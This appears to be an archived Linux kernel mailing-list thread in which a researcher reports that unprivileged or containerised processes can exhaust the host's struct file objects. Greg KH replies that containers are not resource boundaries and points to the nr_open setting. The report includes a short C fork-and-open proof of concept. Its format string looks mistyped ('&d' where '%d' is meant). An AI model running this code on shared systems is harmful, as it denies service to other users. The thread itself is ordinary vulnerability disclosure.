* Report Bug to Linux File System
@ 2021-09-05 6:12 杨男子
2021-09-05 17:16 ` Greg KH
0 siblings, 1 reply; 2+ messages in thread
From: 杨男子 @ 2021-09-05 6:12 UTC (permalink / raw)
To: viro; +Cc: linux-fsdevel, security
Hi, our team has found a problem in fs system on Linux kernel v5.10, leading to DoS attacks.
The struct file can be exhausted by normal users by calling multiple syscalls such as timerfd_create/pipe/open etc. Although the rlimit limits the max fds could be opened by a single process. A normal user can fork multiple processes, repeatedly make the timerfd_create/pipe/open syscalls and exhaust all struct files. As a result, all struct-file-allocation related operations of all other users will fail.
In fact, we try this attack inside a deprivileged docker container without any capabilities. The processes in the docker can exhaust all struct-file on the host kernel. We use a machine with 16G memory. We start 2000 processes, each process with a 1024 limit. In total, around 1613400 number struct-file are consumed and there are no available struct-file in the kernel. The total consumed memory is less than 2G , which is small, so memory control group can not help.
The following code shows a PoC that takes 1613400 number of struct-file, while take all struct-file on host. We evaluate the PoC on intel i5 CPU physical machine + Linux kernel v5.10.0 + Ubuntu 18.04 LTS + Docker 18.06.0-ce.
-----------------------------------------------
#include<stdio.h>
#include<stdlib.h>
#include<unistd.h>
#include<fcntl.h>
int main()
{
for (int i = 1; i < 2000; i++) {
int pid = fork();
if (pid == 0) {
int fd;
char nameout[20];
for (int j = 1; j <= 1020; j++) {
sprintf(nameout, "test&d&d.txt", i, j);
fd = open(nameout, O_CREAT);
}
getchar();
}
}
getchar();
return 0;
}
-----------------------------------------------
Looking forward to your reply!
Nanzi Yang
^ permalink raw reply [flat|nested] 2+ messages in thread* Re: Report Bug to Linux File System
2021-09-05 6:12 Report Bug to Linux File System 杨男子
@ 2021-09-05 17:16 ` Greg KH
0 siblings, 0 replies; 2+ messages in thread
From: Greg KH @ 2021-09-05 17:16 UTC (permalink / raw)
To: 杨男子; +Cc: viro, linux-fsdevel, security
On Sun, Sep 05, 2021 at 02:12:13PM +0800, 杨男子 wrote:
> Hi, our team has found a problem in fs system on Linux kernel v5.10, leading to DoS attacks.
>
> The struct file can be exhausted by normal users by calling multiple syscalls such as timerfd_create/pipe/open etc. Although the rlimit limits the max fds could be opened by a single process. A normal user can fork multiple processes, repeatedly make the timerfd_create/pipe/open syscalls and exhaust all struct files. As a result, all struct-file-allocation related operations of all other users will fail.
>
> In fact, we try this attack inside a deprivileged docker container without any capabilities. The processes in the docker can exhaust all struct-file on the host kernel. We use a machine with 16G memory. We start 2000 processes, each process with a 1024 limit. In total, around 1613400 number struct-file are consumed and there are no available struct-file in the kernel. The total consumed memory is less than 2G , which is small, so memory control group can not help.
As has already been pointed out, containers are not any sort of
"resource boundry" to the overall system.
If you are concerned about processes using too many file handles, and
starving other processes on the system, then restrict them through the
nr_open sysctrl setting, that is what it is there for.
thanks,
greg k-h
^ permalink raw reply [flat|nested] 2+ messages in thread
end of thread, other threads:[~2021-09-05 17:16 UTC | newest]
Thread overview: 2+ messages (download: mbox.gz follow: Atom feed
-- links below jump to the message on this page --
2021-09-05 6:12 Report Bug to Linux File System 杨男子
2021-09-05 17:16 ` Greg KH
This is an external index of several public inboxes,
see mirroring instructions on how to clone and mirror
all data and code used by this external index.